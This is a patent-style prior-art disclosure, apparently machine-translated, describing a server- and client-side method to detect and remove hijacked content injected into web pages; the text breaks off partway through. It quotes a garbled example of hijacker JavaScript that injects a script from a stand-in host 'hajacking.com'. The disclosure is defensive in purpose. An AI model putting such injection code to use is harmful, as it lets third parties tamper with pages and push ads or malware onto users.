Browse Prior Art Database

A new method to protect web page from hijacking

IP.com Disclosure Number: IPCOM000246929D
Publication Date: 2016-Jul-15
Document File: 6 page(s) / 94K

Publishing Venue

The IP.com Prior Art Database

Abstract

We present a new way to prevent web page from hijacking. The method is implemented both on server side and client side. On the server side, for detecting the integrity of JS (JavaScript,) code to build the page structure together, confused and inserted into a random location to do this JS code does confuse high strength. On the client side, this JS code pages do timing integrity testing If contamination is detected web content attempting to remove the contaminated contents and notify the end user and Web server.

This text was extracted from a PDF file.
This is the abbreviated version, containing approximately 28% of the total text.

Page 01 of 6

A new method to protect web page from hijacking

Simmering under the huge business opportunities, network traffic hijacking has become hot topics during China's Internet growth process, such as the use DNS (Domain Name Server) poisoning, JS (JavaScript) poisoning, certain request redirection to hijack search results, advertisements, web content and even download file, which impact ranging from internet experience to the authenticity of network information security such as the risk of account leakage.

Web page hijacking were made by agents that had incentives to change the page, but their goals were not always in line with the goals of the user or the publisher. For example:

ISPs (ISP, Internet Service Provider ) sought to increase revenue from ads. These ads could annoy the user or dilute the impact of the publisher's own ads. Enterprise proxies sought to reduce traffic by removing cache-related meta tags, which could affect whether a user sees a stale copy of the page.

Users sought to remove annoyances like popups and ads, which may affect the publisher's revenue stream.

Malware authors sought to spread worms and make money off injected ads.

Technical principles of hijacking web interface:

Its primary technology is to "coverage one web page frame with another one" on web page which is visible to user, "coverage" refers to the hierarchical relationships between the position of the controls, and the "frame" refers to the iframe tag.

The above principle iframe is one JS created dynamically and placed by hijackers into browser or application. The following is a typical example: (function()

{o="http://victim.com";

sh="http://hajacking.com";

wj=window;d=document;function ins(s,dm,id) {e=d.createElement("script");e.src=s;

e.type="text/javascript";id?e.id=id:null;dm.appendChild(e);}; p=d.scripts[d.scripts.length-1].parentNode;ins(o,p);

ds=function() {db=d.body; if(db&&!document.getElementByID("bdstat")) {ifw.innnerWidth||d.documentElement.clientWidth||db.clientWidth)>1){if(w.top==w.self){ins(sh,db,"bdstat");}}} else {setTimeout("ds()",1500);}};ds();})();

}

Principle:


Web page inserted window is used by the http hijacking, and its main purpose to the end-user web interface or APP insert page window, provide personalized content and advertising false information, the following chart is one of the examples, on public cloud management interface is inserted into an online advertising (ad is in the lower right corner):

1



Page 02 of 6

Web Page is hijacked as follows:

1. Internet users for the first time to launch a GET request for a particular URL (Uniform Resource Locator )

2. Users request packet sent to the destination Server process, a segment ahead of the program get hijacked.

3. Hijacker analysis of user GET request to determine compliance with the terms of advertising insert.

4. Insert window as meet the conditions, it sends HTTP ( Hyper Text Transport Protocol ) 200 status and success of the service request page recombinant js, recombinant js contains the user's original request addresses and phone inspection services address two parts.

5. User terminal (Web browser or APP) ac...